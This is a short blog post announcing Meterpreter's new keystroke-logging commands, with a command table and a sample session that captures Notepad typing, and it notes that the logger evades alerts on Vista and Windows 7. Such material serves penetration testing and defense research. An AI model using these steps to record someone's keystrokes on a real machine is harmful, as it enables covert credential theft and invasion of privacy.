Keystroke Logging comes to Meterpreter

Today HD committed bug fixes and updates to Meterpreter to the SVN development tree, and the coolest of them all has to be keystroke logging. Now when you use Meterpreter as a payload, the stdapi gives you the ability to start keystroke logging by running a simple set of commands. The new commands appear as follows:

Stdapi: User interface Commands
===============================
    Command        Description
    -------        -----------
    grabdesktop    Take over the active input desktop (needed for keyboard sniffing)
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump they keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    uictl          Control some of the user interface components

The new commands are grabdesktop, keyscan_dump, keyscan_start and keyscan_stop. To start capturing keystrokes we must first run grabdesktop and then keyscan_start; this starts the capture of all keyboard input into memory.

meterpreter > grabdesktop
Trying to hijack the input desktop...
meterpreter > keyscan_start
Starting the keystroke sniffer...

To dump the content of the buffer we run keyscan_dump. For this example I captured some text I typed into Notepad:

meterpreter > keyscan_dump
Dumping captured keystrokes...
 <Back> epnow this a <Back> s a killer feature!!!!!!!! <Return>
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter >

Once the keystrokes are dumped they are cleared from the buffer, so save the output every time you do a dump, since otherwise it will be lost. This new feature only captures keyboard input; it will not capture clipboard content or any copy/paste activity. It is extremely stealthy, since it resides only in memory, and on my test machines with Vista with UAC enabled and on Windows 7 it did not trigger any alert. I'm anxiously looking forward to what will come next from the Metasploit team.

UPDATE 3/26/09

HD is making some changes in the code and to the names in the menu. As soon as I have a chance to test and run it in the lab I will post an update to the post.